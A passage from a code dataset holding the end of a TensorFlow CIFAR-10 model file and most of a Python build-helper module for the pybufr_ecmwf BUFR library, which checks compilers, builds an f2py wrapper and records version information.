tf.nn.dropout(output, dropout_keep_probability)\n return tf.matmul(output, output_weights) + output_biases\n\n # Training computation.\n logits = create_model_graph(tf_train_dataset, add_dropout = True)\n module_weights = functools.reduce(lambda a, b: a + b, map(lambda m: m.get_weights(), modules))\n layer_weights = [ seven_by_seven_conv_pre_layer_weights ] + module_weights + [ fc_layer_one_weights, output_weights ]\n loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits, tf_train_labels) + get_l2_loss(l2_lambda, layer_weights))\n\n # Optimizer.\n global_step = tf.Variable(0, name=\"global_step\", trainable=False)\n decayed_learning_rate = tf.train.exponential_decay(learning_rate, global_step, decay_steps, decay_rate)\n optimizer = tf.train.GradientDescentOptimizer(decayed_learning_rate).minimize(loss, global_step=global_step)\n\n # Predictions for the training, validation, and test data.\n train_prediction = tf.nn.softmax(logits)\n eval_prediction = tf.nn.softmax(create_model_graph(eval_dataset))\n \n saver = tf.train.Saver()\n return Model(graph, batch_size, eval_batch_size, tf_train_dataset, tf_train_labels, eval_dataset, dropout_keep_probability, logits, loss, optimizer, train_prediction, eval_prediction, saver, global_step, layer_weights)\n","repo_name":"ashleyjsands/cifar-10-tensorflow","sub_path":"inception_module_model.py","file_name":"inception_module_model.py","file_ext":"py","file_size_in_byte":17748,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"24496604601","text":"from __future__ import (absolute_import, division,\n print_function) # , unicode_literals)\nimport os # operating system functions\nimport sys # operating system functions\nimport glob # allow for filename expansion\nimport tarfile # handle tar archives\nimport shutil # portable file copying functions\nimport subprocess # support running additional executables\nimport stat # handling of file stat data\nimport datetime # date handling functions\n\nfrom pybufr_ecmwf.helpers import (get_and_set_the_module_path,\n get_software_root)\nfrom pybufr_ecmwf.custom_exceptions import (ProgrammingError,\n LibraryBuildError,\n InterfaceBuildError)\n# not used: BuildException\n# #]\n# #[ constants\n\n# the first one found will be used, unless a preferred one is specified.\nPOSSIBLE_F_COMPILERS = ['gfortran', 'g95', 'g77',\n 'f90', 'f77', 'ifort', 'pgf90', 'pgf77']\nPOSSIBLE_C_COMPILERS = ['gcc', 'icc', 'cc']\n# define common compiler flags for each compiler\n# (also used for the custom case)\nFFLAGS_COMMON = ['-O', '-Dlinux', '-fPIC']\nCFLAGS_COMMON = ['-O', '-fPIC']\n# define specific compiler flags for each compiler\n# needed to build the ECMWF BUFR library\nFFLAGS_NEEDED = {'g95': ['-i4', '-r8', '-fno-second-underscore'],\n 'gfortran': ['-fno-second-underscore', ],\n 'gfortran_10': ['-fno-second-underscore',\n '-fallow-argument-mismatch',],\n 'g77': ['-i4', ],\n 'f90': ['-i4', ],\n 'f77': ['-i4', ],\n 'pgf90': ['-i4', ],\n 'pgf77': ['-i4', ],\n 'ifort': ['-i4', ]}\nCFLAGS_NEEDED = {'gcc': [],\n 'icc': [],\n 'cc': []}\n\nfor k in FFLAGS_NEEDED:\n FFLAGS_NEEDED[k].extend(FFLAGS_COMMON)\nfor k in CFLAGS_NEEDED:\n CFLAGS_NEEDED[k].extend(CFLAGS_COMMON)\n\nSO_FILE_PATTERN = 'ecmwfbufr.cpython*.so'\n\n# #]\n\n# #[ some helper functions\ndef rem_quotes(txt):\n # #[\n \"\"\" a little helper function to remove quotes from a string.\"\"\"\n if txt is None:\n return txt\n elif txt[0] == \"'\" and txt[-1] == \"'\":\n return txt[1:-1]\n elif txt[0] == '\"' and txt[-1] == '\"':\n return txt[1:-1]\n else:\n return txt\n # #]\ndef ensure_permissions(filename, mode):\n # #[ ensure permissions for \"world\"\n \"\"\" a little routine to ensure the permissions for the\n given file are as expected \"\"\"\n file_stat = os.stat(filename)\n current_mode = stat.S_IMODE(file_stat.st_mode)\n new_mode = None\n if mode == 'r':\n new_mode = current_mode | int(\"444\", 8)\n if mode == 'w':\n new_mode = current_mode | int(\"222\", 8)\n if mode == 'x':\n new_mode = current_mode | int(\"111\", 8)\n if mode == 'rx':\n new_mode = current_mode | int(\"555\", 8)\n if new_mode:\n os.chmod(filename, new_mode)\n else:\n print('ERROR in ensure_permissions: unknown mode string: ', mode)\n raise ProgrammingError\n # #]\ndef run_shell_command(cmd, libpath=None, catch_output=True,\n module_path='./', verbose=True):\n # #[\n \"\"\" a wrapper routine around subprocess.Popen intended\n to make it a bit easier to call this functionality.\n Options:\n -libpath: add this path to the LD_LIBRARY_PATH environment variable\n before executing the subprocess\n -catch_output: if True, this function returns 2 lists of text lines\n containing the stdout and stderr of the executed subprocess\n -verbose: give some feedback to the user while executing the\n code (usefull for debugging)\"\"\"\n\n # get the list of already defined env settings\n env = os.environ\n if libpath:\n # add the additional env setting\n envname = \"LD_LIBRARY_PATH\"\n if envname in env:\n env[envname] = env[envname] + \":\" + libpath\n else:\n env[envname] = libpath\n\n if 'PYTHONPATH' in env:\n env['PYTHONPATH'] = env['PYTHONPATH']+':'+module_path\n else:\n env['PYTHONPATH'] = module_path\n\n if verbose:\n print(\"Executing command: \", cmd)\n\n if catch_output:\n # print('env[PYTHONPATH] = ', env['PYTHONPATH'])\n subpr = subprocess.Popen(cmd, shell=True, env=env,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n\n # wait until the child process is done\n # subpr.wait() # seems not necessary when catching stdout and stderr\n\n if sys.version_info[0] == 2:\n lines_stdout = subpr.stdout.readlines()\n lines_stderr = subpr.stderr.readlines()\n elif sys.version_info[0] == 3:\n # in python 3 the readlines() method returns bytes,\n # so convert them to a unicode string for convenience\n tmp_lines_stdout = subpr.stdout.readlines()\n tmp_lines_stderr = subpr.stderr.readlines()\n lines_stdout = []\n lines_stderr = []\n for line in tmp_lines_stdout:\n lines_stdout.append(line.decode('utf-8'))\n for line in tmp_lines_stderr:\n lines_stderr.append(line.decode('utf-8'))\n else:\n errtxt = 'This python version is not supported: '+sys.version\n raise NotImplementedError(errtxt)\n\n #print(\"lines_stdout: \", lines_stdout)\n #print(\"lines_stderr: \", lines_stderr)\n\n return (lines_stdout, lines_stderr)\n\n else:\n subpr = subprocess.Popen(cmd, shell=True, env=env)\n\n # wait until the child process is done\n subpr.wait()\n return\n # #]\ndef fortran_compile_and_execute(fcmp, fflags, f_code, f_executable, f_libpath):\n # #[\n \"\"\" convenience routine to compile and execute a bit of fortran code,\n and to return the stdout and stderr generated by the just compiled code.\n \"\"\"\n f_file = f_executable+\".F90\"\n tfd = open(f_file, 'w')\n tfd.write(f_code)\n tfd.close()\n\n # contruct the compile command\n cmd = fcmp+' '+fflags+' -o '+f_executable+' '+f_file\n\n # now issue the compile command\n if f_libpath == \"\":\n print(\"Executing command: \", cmd)\n os.system(cmd)\n else:\n run_shell_command(cmd, libpath=f_libpath, catch_output=False)\n\n # now execute the just generated test program to verify if we succeeded\n # add a './' to ensure the executable is also found for users that\n # do not have '.' in their default search path\n cmd = os.path.join('.', f_executable)\n if f_libpath == \"\":\n (lines_stdout, lines_stderr) = run_shell_command(cmd)\n else:\n (lines_stdout, lines_stderr) = \\\n run_shell_command(cmd, libpath=f_libpath)\n\n # clean up\n os.remove(f_file)\n\n return (lines_stdout, lines_stderr)\n # #]\ndef fortran_compile_test(fcmp, fflags, f_libpath):\n # #[\n \"\"\" a method to check if we really have some fortran compiler\n installed (it writes a few lines of fortran, tries to compile\n it, and compares the output with the expected output) \"\"\"\n\n # Note: for now the flags are not used in these test because these\n # are specific for generating a shared-object file, and will fail to\n # generate a simple executable for testing\n\n fortran_test_code = \\\n\"\"\"\nprogram pybufr_test_program\n\n print *,'Hello pybufr module:'\n print *,'Fortran compilation seems to work fine ...'\n\nend program pybufr_test_program\n\"\"\"\n\n # generate a testfile with a few lines of Fortran90 code\n fortran_test_executable = \"pybufr_fortran_test_program\"\n (lines_stdout, lines_stderr) = \\\n fortran_compile_and_execute(fcmp, fflags, fortran_test_code,\n fortran_test_executable,\n f_libpath)\n\n expected_output = [' Hello pybufr module:\\n',\n ' Fortran compilation seems to work fine ...\\n']\n if ((expected_output[0] not in lines_stdout) or\n (expected_output[1] not in lines_stdout)):\n print(\"ERROR: Fortran compilation test failed; \"+\n \"something seems very wrong\")\n print(\"Expected output: \", expected_output)\n print('actual output stdout = ', lines_stdout)\n print('actual output stderr = ', lines_stderr)\n raise EnvironmentError\n\n print(\"Fortran compilation test successfull...\")\n\n # clean up\n os.remove(fortran_test_executable)\n # #]\ndef c_compile_and_execute(ccmp, cflags, c_code, c_executable, c_libpath):\n # #[\n \"\"\" convenience routine to compile and execute a bit of c code,\n and to return the stdout and stderr generated by the just compiled code.\n \"\"\"\n # Note: for now the flags are not used in these test because these\n # are specific for generating a shared-object file, and will fail to\n # generate a simple executable for testing\n # libpath may point to a custom LD_LIBRARY_PATH setting\n # needed to run the compiler\n c_file = c_executable+\".c\"\n tfd = open(c_file, 'w')\n tfd.write(c_code)\n tfd.close()\n\n # contruct the compile command\n cmd = ccmp+' '+cflags+' -o '+c_executable+' '+c_file\n\n # now issue the compile command\n if c_libpath == \"\":\n print(\"Executing command: \", cmd)\n os.system(cmd)\n else:\n run_shell_command(cmd, libpath=c_libpath, catch_output=False)\n\n # now execute the just generated program\n # add a './' to ensure the executable is also found for users that\n # do not have '.' in their default search path\n cmd = os.path.join('.', c_executable)\n if c_libpath == \"\":\n (lines_stdout, lines_stderr) = run_shell_command(cmd)\n else:\n (lines_stdout, lines_stderr) = run_shell_command(cmd, libpath=c_libpath)\n\n # clean up\n os.remove(c_file)\n\n return (lines_stdout, lines_stderr)\n # #]\ndef c_compile_test(ccmp, cflags, c_libpath):\n # #[\n \"\"\" a method to check if we really have some c compiler\n installed (it writes a few lines of c, tries to compile\n it, and compares the output with the expected output) \"\"\"\n\n c_test_code = \\\nr\"\"\"\n#include \nint main()\n{\n printf(\"Hello pybufr module:\\n\");\n printf(\"c compilation seems to work fine ...\\n\");\n return 0;\n}\n\"\"\"\n\n # generate a testfile with a few lines of Fortran90 code\n c_test_executable = \"pybufr_c_test_program\"\n (lines_stdout, lines_stderr) = \\\n c_compile_and_execute(ccmp, cflags, c_test_code,\n c_test_executable, c_libpath)\n\n expected_output = ['Hello pybufr module:\\n',\n 'c compilation seems to work fine ...\\n']\n if ((expected_output[0] not in lines_stdout) or\n (expected_output[1] not in lines_stdout)):\n print(\"ERROR: c compilation test failed; something seems very wrong\")\n print(\"Expected output: \", expected_output)\n print('actual output stdout = ', lines_stdout)\n print('actual output stderr = ', lines_stderr)\n raise EnvironmentError\n\n print(\"c compilation test successfull...\")\n\n # clean up\n os.remove(c_test_executable)\n # #]\ndef retrieve_integer_sizes(ccmp, cflags, c_libpath,\n fcmp, fflags, f_libpath):\n # #[\n \"\"\" some trickery to retrieve the currently used integer variable\n sizes in both fortran and c\n \"\"\"\n #CSIZEINT=`../support/GetByteSizeInt`\n #CSIZELONG=`../support/GetByteSizeLong`\n #F90SIZEINT=`../support/GetByteSizeDefaultInteger`\n\n c_code = \\\nr\"\"\"\n#include \nint main()\n{\n int testinteger;\n printf(\"%zu\\n\",sizeof(testinteger));\n return 0;\n}\n\"\"\"\n c_executable = 'GetByteSizeInt'\n lines_stdout = c_compile_and_execute(ccmp, cflags, c_code,\n c_executable, c_libpath)[0]\n bytesizeint = lines_stdout[0].strip()\n\n c_code = \\\nr\"\"\"\n#include \nint main()\n{\n long testinteger;\n printf(\"%zu\\n\",sizeof(testinteger));\n return 0;\n}\n\"\"\"\n c_executable = 'GetByteSizeLong'\n lines_stdout = c_compile_and_execute(ccmp, cflags, c_code,\n c_executable, c_libpath)[0]\n bytesizelong = lines_stdout[0].strip()\n\n f90_code = \\\nr\"\"\"\nprogram GetByteSizeDefaultInteger\n integer :: default_integer, nbytes_default_integer\n inquire(iolength=nbytes_default_integer) default_integer\n print *,nbytes_default_integer\nend program GetByteSizeDefaultInteger\n\"\"\"\n f90_executable = 'GetByteSizeDefaultInteger'\n lines_stdout = \\\n fortran_compile_and_execute(fcmp, fflags, f90_code,\n f90_executable, f_libpath)[0]\n try:\n bytesizedefaultinteger = lines_stdout[0].strip()\n except IndexError:\n bytesizedefaultinteger = None\n\n if bytesizedefaultinteger is None:\n # try again, now defining nbytes_default_integer explicitely\n # as 8-byte integer, which seems needed if you compile\n # with g95-64 bit version combined with the -i4 option\n f90_code = \\\nr\"\"\"\nprogram GetByteSizeDefaultInteger\n integer :: default_integer\n integer*8 :: nbytes_default_integer\n inquire(iolength=nbytes_default_integer) default_integer\n print *,nbytes_default_integer\nend program GetByteSizeDefaultInteger\n\"\"\"\n f90_executable = 'GetByteSizeDefaultInteger'\n lines_stdout = \\\n fortran_compile_and_execute(fcmp, fflags, f90_code,\n f90_executable, f_libpath)[0]\n try:\n bytesizedefaultinteger = lines_stdout[0].strip()\n except IndexError:\n bytesizedefaultinteger = None\n\n if bytesizedefaultinteger is None:\n txt = 'ERROR: could not retrieve bytesizedefaultinteger '+\\\n 'for this fortran compiler: '+fcmp\n raise ProgrammingError(txt)\n\n # print('GetByteSizeInt: ',bytesizeint)\n # print('GetByteSizeLong: ',bytesizelong)\n # print('GetByteSizeDefaultInteger: ',bytesizedefaultinteger)\n\n return (bytesizeint, bytesizelong, bytesizedefaultinteger)\n # #]\ndef insert_pb_interface_definition(sfd, integer_sizes):\n # #[\n \"\"\" the pb interface routines are mostly written in c, so f2py\n will not automatically generate their signature. This\n subroutine explicitely adds these signatures.\n \"\"\"\n\n #(ByteSizeInt, ByteSizeLong, ByteSizeDefaultInteger) = integer_sizes\n bytesizelong = integer_sizes[1]\n\n #intlen = None\n #if ByteSizeDefaultInteger == ByteSizeInt:\n # intlen = ByteSizeInt # = 4 bytes\n #if ByteSizeDefaultInteger == ByteSizeLong:\n # intlen = ByteSizeLong # = 8 bytes\n\n intlen = bytesizelong # = 8 bytes\n print('Using intlen = ', intlen, ' to build the pbio interface')\n\n indentation = 8*' '\n lines_to_add = \\\n [\"subroutine pbopen(cFileUnit,BufrFileName,mode,bufr_error_flag)\",\n #\" intent(c) pbopen\"\n #\" intent(c)\"\n \" integer*\"+intlen+\", intent(out) :: cFileUnit\",\n \" character(len=*), intent(in) :: BufrFileName\",\n \" character(len=1), intent(in) :: mode\",\n \" integer*\"+intlen+\", intent(out) :: bufr_error_flag\",\n \"end subroutine pbopen\",\n \"subroutine pbclose(cFileUnit,bufr_error_flag)\",\n \" integer*\"+intlen+\", intent(inplace) :: cFileUnit\",\n \" integer*\"+intlen+\", intent(inplace) :: bufr_error_flag \",\n \"end subroutine pbclose\",\n# this one is implemented in Fortran, and is handled by\n# adapt_f2py_signature_file defined next, so manual fix is needed for it.\n# \"subroutine pbbufr(cFileUnit,Buffer,BufferSizeBytes,MsgSizeBytes,&\",\n# \" bufr_error_flag)\",\n# \" integer*\"+intlen+\", intent(inplace) :: cFileUnit\",\n# \" integer*\"+intlen+\",dimension(*), intent(inplace) :: Buffer\",\n# \" integer*\"+intlen+\", intent(inplace) :: BufferSizeBytes\",\n# \" integer*\"+intlen+\", intent(inplace) :: MsgSizeBytes\",\n# \" integer*\"+intlen+\", intent(inplace) :: bufr_error_flag \",\n# \"end subroutine pbbufr\",\n \"subroutine pbwrite(cFileUnit,Buffer,MsgSizeBytes,bufr_return_value)\",\n \" integer*\"+intlen+\", intent(inplace) :: cFileUnit\",\n \" integer*\"+intlen+\",dimension(*), intent(inplace) :: Buffer\",\n \" integer*\"+intlen+\", intent(inplace) :: MsgSizeBytes\",\n \" integer*\"+intlen+\\\n \", intent(inplace) :: bufr_return_value\",\n \"end subroutine pbwrite\",\n \"subroutine pbseek(cFileUnit,offset,whence,bufr_return_value)\",\n \" integer*\"+intlen+\", intent(in) :: cFileUnit\",\n \" integer*\"+intlen+\", intent(in) :: offset\",\n \" integer*\"+intlen+\", intent(in) :: whence\",\n \" integer*\"+intlen+\", intent(out) :: bufr_return_value\",\n \"end subroutine pbseek\"]\n\n print(\"Inserting hardcoded interface to pbio routines in \"+\n \"signatures file ...\")\n for lta in lines_to_add:\n sfd.write(indentation+lta+'\\n')\n\n # #]\ndef adapt_f2py_signature_file(signature_file, integer_sizes, set_jelem,\n verbose=False):\n # #[\n \"\"\"\n some code to adapt the signature file generated by the f2py tool.\n Regrettably this is needed since this tool seems not to handle\n constant parameters defined in include files properly.\n \"\"\"\n # NOTE: maybe this modification is not needed if I can get the file\n # with the parameters included in an other way.\n # Looking at the f2py manpage the option -include might do the\n # trick but that one is depricated. In stead a usercode section\n # should be used, but that again means modifying the signature\n # file ...\n # Also the --include_paths option might be related.\n # TODO: sort this out (handling of constant parameters by f2py)\n\n #signature_file = \"f2py_build/signatures.pyf\"\n\n # these values are defined in parameter.F\n # PARAMETER(JSUP = 9,\n # JSEC0= 3,\n # JSEC1= 40,\n # JSEC2=4096,\n # JSEC3= 4\n # JSEC4= 2,\n # JELEM=320000,\n # JSUBS=400,\n # JCVAL=150 ,\n # JBUFL=512000,\n # JBPW = 32,\n # JTAB =3000,\n # JCTAB=3000,\n # JCTST=9000,\n # JCTEXT=9000,\n # JWORK=4096000,\n # JKEY=46,\n # JTMAX=10,\n # JTCLAS=64,\n # JTEL=255)\n\n # WARNING:\n # these numbers really should NOT be hardcoded here\n # but extracted from the fortran code.\n # However, at this point in time the interface to\n # fortran is not yet available, so for now use this\n # quick and dirty workaround...\n edits = {}\n edits['JSUP'] = 9\n edits['JSEC0'] = 3\n edits['JSEC1'] = 40\n edits['JSEC2'] = 4096\n edits['JSEC3'] = 4\n edits['JSEC4'] = 2\n if set_jelem is not None:\n edits['JELEM'] = str(set_jelem)\n else:\n edits['JELEM'] = 320000\n edits['JSUBS'] = 400\n edits['JCVAL'] = 150\n edits['JBUFL'] = 512000\n edits['JBPW'] = 32\n edits['JTAB'] = 3000\n edits['JCTAB'] = 3000\n edits['JCTST'] = 9000\n edits['JCTEXT'] = 9000\n edits['JWORK'] = 4096000\n edits['JKEY'] = 46\n edits['JTMAX'] = 10\n edits['JTCLAS'] = 64\n edits['JTEL'] = 255\n # edits[''] =\n\n # read the file\n lines = open(signature_file).readlines()\n\n # create a backup copy, to allow manual inspection\n source = signature_file\n destination = signature_file+\".bak\"\n shutil.copyfile(source, destination)\n\n print(\"Fixing array size definitions in signatures definition ...\")\n sfd = open(signature_file, \"w\")\n inside_subroutine = False\n inside_retrieve_settings = False\n inside_pbbufr_sign = False\n for line in lines:\n\n mod_line = line\n\n if 'end subroutine' in mod_line:\n inside_subroutine = False\n elif 'subroutine' in mod_line:\n inside_subroutine = True\n\n if 'end subroutine retrieve_settings' in mod_line:\n inside_retrieve_settings = False\n elif 'subroutine retrieve_settings' in mod_line:\n inside_retrieve_settings = True\n\n if 'end subroutine pbbufr' in mod_line:\n inside_pbbufr_sign = False\n elif 'subroutine pbbufr' in mod_line:\n inside_pbbufr_sign = True\n\n if inside_subroutine:\n if ' ::' in mod_line:\n # Add the intent(inplace) switch to all subroutine\n # parameters.\n # This might not be very pretty, but otherwise all\n # parameters are assigned the default, which is intent(in).\n # Maybe the proper way would be to sort out for each routine\n # in this library which parameters are intent(in) and\n # which are intent(out), but this is a huge task (and\n # should be done by ECMWF rather then by us I think...)\n if not 'intent(out)' in mod_line:\n # do this only for code that has no explicit intent(out)\n (part1, part2) = mod_line.split(' ::')\n if inside_retrieve_settings:\n # explicitely add intent(out)\n # this seems needed for the python3 case!\n mod_line = part1+',intent(out) ::'+part2\n else:\n mod_line = part1+',intent(inplace) ::'+part2\n\n if inside_pbbufr_sign:\n # fix a bug in the pbbufr.F fortran code that causes f2py to\n # fail on interfacing to this routine\n if 'integer dimension(1),intent(inplace) :: karray' in mod_line:\n mod_line = mod_line.replace('dimension(1)', 'dimension(*)')\n\n if 'dimension' in mod_line:\n for edit in edits:\n # the value inside the dimension() spec\n # in the signature file sometimes has extra braces.\n # sometimes not (depending on the f2py version).\n # and in case of 2 dimensions, the value to be replaced\n # ends with a comma.\n # So at least 3 cases are to be considered here.\n txt1 = '(('+edit.lower()+'))'\n txt2 = '('+edit.lower()+')'\n txt3 = '('+edit.lower()+','\n value1 = '('+str(edits[edit])+')'\n value2 = '('+str(edits[edit])+')'\n value3 = '('+str(edits[edit])+','\n if txt1 in mod_line:\n mod_line = mod_line.replace(txt1, value1)\n elif txt2 in mod_line:\n mod_line = mod_line.replace(txt2, value2)\n elif txt3 in mod_line:\n mod_line = mod_line.replace(txt3, value3)\n\n if mod_line.strip() == \"end interface\":\n # NOTE: the pb interface routines are written in c, so f2py\n # will not automatically generate their signature. This next\n # subroutine call explicitely adds these signatures.\n insert_pb_interface_definition(sfd, integer_sizes)\n\n if verbose:\n if mod_line != line:\n print(\"adapting line: \", line)\n print(\"to : \", mod_line)\n\n sfd.write(mod_line)\n\n sfd.close()\n # #]\ndef descend_dirpath_and_find(input_dir, glob_pattern):\n # #[\n \"\"\"\n a little helper routine that steps down the different components\n of the provided directory path, and tests for the presence of\n a file that matches the given glob pattern.\n If a match is found, the directory in which the match is present,\n and a list of matching files is returned.\n If no match is found a tuple with two None values is returned.\n \"\"\"\n absdirname = os.path.abspath(input_dir)\n # print('start: absdirname = ',absdirname)\n while absdirname != \"/\":\n pattern = os.path.join(absdirname, glob_pattern)\n filelist = glob.glob(pattern)\n if len(filelist) > 0:\n # print('descend_dirpath_and_find succeeded: result')\n # print('(absdirname, filelist) = ',(absdirname, filelist))\n return (absdirname, filelist)\n base = os.path.split(absdirname)[0]\n absdirname = base\n # print('next: absdirname = ',absdirname)\n\n # print('descend_dirpath_and_find failed: no result found')\n return (None, None)\n # #]\ndef extract_version():\n # #[\n \"\"\" a little function to extract the module version from\n the setup.py script, and if present, extract the mercurial\n revision from the hg repository, and store it in a place where\n the user can access it.\n \"\"\"\n\n # assume we are inside the pybufr_ecmwf module dir\n # when this function is executed.\n\n # retrieve the software version\n software_version = 'unknown'\n (setuppath, setupfiles) = descend_dirpath_and_find(os.getcwd(), 'setup.py')\n if not setuppath:\n print('ERROR: could not locate setup.py script needed to extract')\n print('ERROR: the current software version')\n raise ProgrammingError\n\n for line in open(os.path.join(setuppath, setupfiles[0])).readlines():\n if 'version=' in line:\n quoted_version = line.split('=')[1].replace(',', '')\n software_version = quoted_version.replace(\"'\", '').strip()\n\n # retrieve mercurial revision if possible\n hg_version = 'undefined'\n if os.path.exists('.hg'):\n cmd = 'hg log -l 1'\n lines_stdout = run_shell_command(cmd)[0]\n for line in lines_stdout:\n if 'changeset:' in line:\n hg_version = line.split()[1]\n\n # retrieve git revision if possible\n git_version = 'undefined'\n if os.path.exists('.git'):\n cmd = 'git log -n 1'\n lines_stdout = run_shell_command(cmd)[0]\n for line in lines_stdout:\n if 'commit:' in line:\n git_version = line.split()[1]\n\n # retrieve the install date (i.e. todays date)\n # current date formatted as: 07-aug-2009\n install_date = datetime.date.today().strftime(\"%d-%b-%Y\")\n\n # store the result\n version_file = 'version.py'\n fds = open(version_file, 'w')\n fds.write(\"software_version = '\"+software_version+\"'\\n\")\n fds.write(\"hg_version = '\"+hg_version+\"'\\n\")\n fds.write(\"git_version = '\"+git_version+\"'\\n\")\n fds.write(\"install_date = '\"+install_date+\"'\\n\")\n fds.write(\"version = '\"+software_version+'; '+\\\n hg_version+'; '+install_date+\"'\\n\")\n fds.close()\n ensure_permissions(version_file, 'rx')\n # #]\ndef symlink_to_all_files(source_dir, dest_dir):\n # #[ create symlinks in dest_dir for all links in source_dir\n '''\n a helper routine to create symbolic links to all available\n BUFR tables in the dest_dir directory.\n '''\n filelist_b = glob.glob(os.path.join(source_dir, 'B*'))\n filelist_c = glob.glob(os.path.join(source_dir, 'C*'))\n filelist_d = glob.glob(os.path.join(source_dir, 'D*'))\n filelist = filelist_b\n filelist.extend(filelist_c)\n filelist.extend(filelist_d)\n\n # first copy the real files\n for fnm in filelist:\n filename = os.path.split(fnm)[1]\n if not os.path.islink(fnm):\n dest = os.path.join(dest_dir, filename)\n shutil.copy(fnm, dest)\n # and make sure they are world readable\n # to ensure the module can be used by all, even if\n # the setup.py build was done as root or using sudo\n os.chmod(dest, 0o0644)\n \n # then create all symlinks\n links = []\n for fnm in filelist:\n filename = os.path.split(fnm)[1]\n if os.path.islink(fnm):\n realname = os.path.realpath(fnm)\n realfilename = os.path.split(realname)[1]\n links.append((realfilename, filename))\n\n cwd = os.getcwd()\n os.chdir(dest_dir)\n for (realfilename, filename) in links:\n os.symlink(realfilename, filename)\n os.chdir(cwd)\n\n # print(filelist)\n # sys.exit(1)\n\n # #]\ndef generate_c_underscore_wrapper(source_dir):\n # #[ create macosx wrapper code\n print('starting generate_c_underscore_wrapper')\n source_file_list = source_dir+\"/bufrdc/*.F \"+\\\n source_dir+\"/pbio/pbbufr.F\"\n # print(source_file_list)\n wrapper_name = source_dir+\"/pbio/c_macosx_wrapper.c\"\n fd_out = open(wrapper_name,'w')\n for pattern in source_file_list.split():\n for fortran_file in glob.glob(pattern):\n cmd = 'grep -i subroutine '+fortran_file\n (lines_stdout, lines_stderr) = run_shell_command(cmd, verbose=False)\n # these lines are unicode strings in python3\n for line in lines_stdout:\n def_line = line.strip()\n #print('['+def_line+']')\n if def_line=='':\n continue\n if def_line[0]!='C':\n subr_name = def_line.split()[1].split('(')[0]\n #print('file: '+fortran_file,\n # 'subr_name: '+subr_name)\n fd_out.write('extern void *{0}_();\\n'.\\\n format(subr_name))\n fd_out.write('void *_{0}_() {{ return {1}_(); }}\\n\\n'.\\\n format(subr_name, subr_name))\n\n # manually add the 4 needed c-functions from pbio.c\n for c_func in ['pbopen', 'pbclose', 'pbwrite', 'pbseek']:\n fd_out.write('extern void *{0}();\\n'.\\\n format(c_func))\n fd_out.write('void *_{0}() {{ return {1}(); }}\\n\\n'.\\\n format(c_func, c_func))\n\n fd_out.close()\n\n print('Created wrapper: '+wrapper_name)\n return wrapper_name\n # #]\n# #]\n\nclass InstallBUFRInterfaceECMWF(object):\n # #[ the main builder class\n \"\"\"\n a class that builds the interface between the ECMWF\n BUFR library and python,\n \"\"\"\n def __init__(self, verbose=False,\n preferred_fortran_compiler=None,\n preferred_c_compiler=None,\n fortran_compiler=None,\n fortran_ld_library_path=None,\n fortran_flags=None,\n c_compiler=None,\n c_ld_library_path=None,\n c_flags=None,\n set_jelem=None,\n debug_f2py_c_api=False):\n # #[\n\n # first remove any quotes that may be around the strings\n # (this may happen if the user uses quotes in the setup.cfg file)\n self.preferred_fortran_compiler = rem_quotes(preferred_fortran_compiler)\n self.preferred_c_compiler = rem_quotes(preferred_c_compiler)\n self.fortran_compiler = rem_quotes(fortran_compiler)\n self.fortran_ld_library_path = rem_quotes(fortran_ld_library_path)\n self.c_compiler = rem_quotes(c_compiler)\n self.c_ld_library_path = rem_quotes(c_ld_library_path)\n self.fortran_flags = rem_quotes(fortran_flags)\n self.c_flags = rem_quotes(c_flags)\n self.set_jelem = set_jelem\n self.debug_f2py_c_api = debug_f2py_c_api\n\n # save the verbose setting\n self.verbose = verbose\n\n # save the location to be used for installing the ECMWF BUFR library\n self.ecmwf_bufr_lib_dir = \"./ecmwf_bufr_lib\"\n\n # define the names of the library and shared object files\n # that will be created by this class\n self.bufr_lib_file = \"libbufr.a\"\n\n self.wrapper_build_dir = \"f2py_build\"\n self.wrapper_module_name = \"ecmwfbufr\"\n\n # init other module attributes to None\n self.fortran_compiler_to_use = None\n self.c_compiler_to_use = None\n\n # variable to store current integer sizes in c and Fortran\n self.integer_sizes = None\n # #]\n def build(self):\n # #[\n \"\"\"a method to start building the BUFR interface\"\"\"\n\n bufr_was_build = False\n wrapper_was_build = False\n\n # check for the presence of the library\n if os.path.exists(self.bufr_lib_file):\n print(\"BUFR library seems present\")\n else:\n print(\"Entering installation sequence:\")\n self.install()\n print(\"compilation of BUFR library finished\")\n bufr_was_build = True\n\n try:\n wrapper_name = glob.glob(SO_FILE_PATTERN)[0]\n except IndexError:\n wrapper_name = 'undefined'\n\n if os.path.exists(wrapper_name):\n print(\"python wrapper seems present\")\n else:\n print(\"Entering wrapper generation sequence:\")\n source_dir = self.get_source_dir()[0]\n self.generate_python_wrapper(source_dir)\n print(\"compilation of library wrapper finished\")\n wrapper_was_build = True\n\n if (not bufr_was_build) and (not wrapper_was_build):\n print(\"\\nNothing to do\\n\"+\n \"Execute the clean.py tool if you wish to start again \"+\n \"from scratch.\")\n\n print('extracting library constants')\n self.extract_constants()\n\n print('storing version info')\n extract_version()\n\n print('copying sample files')\n self.copy_sample_files()\n # #]\n def rebuild(self):\n # #[ rebuild the software\n \"\"\" same as install, but always run the make, even if the\n wrapper library already seems present\"\"\"\n self.install(remake=True)\n source_dir = self.get_source_dir()[0]\n self.generate_python_wrapper(source_dir, remake=True)\n # #]\n def clean(self):\n # #[\n \"\"\" a method to clean-up things that I don't want to have\n included in the binary/rpm distributions.\"\"\"\n\n # if verbose is set this signals we are debugging the\n # code, so do not remove temp folders in that case\n #if self.verbose:\n return\n\n # this is a bit of a dirty hack.\n # It removes the subdir ecmwf_bufr_lib and everything below\n # to prevent it to be included in the binary/rpm distributions\n # There should be a nicer way to do this, but I have not\n # yet found it ...\n\n dirs_to_remove = [self.ecmwf_bufr_lib_dir,\n self.wrapper_build_dir]\n\n for dir_to_remove in dirs_to_remove:\n if os.path.exists(dir_to_remove):\n cmd = r'\\rm -rf '+dir_to_remove\n print(\"executing command: \", cmd)\n os.system(cmd)\n # #]\n def use_bundled_library_copy(self):\n # #[\n \"\"\" copy the bundled version\n of the library sources stored in ecmwf_bufr_lib_sources.\n We must descend the directory tree first to find the root\n before doing this copy. \"\"\"\n\n # make sure the destination dir exists\n if not os.path.exists(self.ecmwf_bufr_lib_dir):\n os.makedirs(self.ecmwf_bufr_lib_dir)\n\n cwd = os.getcwd()\n absdirname = os.path.abspath(cwd)\n while absdirname != \"/\":\n files = os.listdir(absdirname)\n if \"setup.cfg\" in files:\n pattern 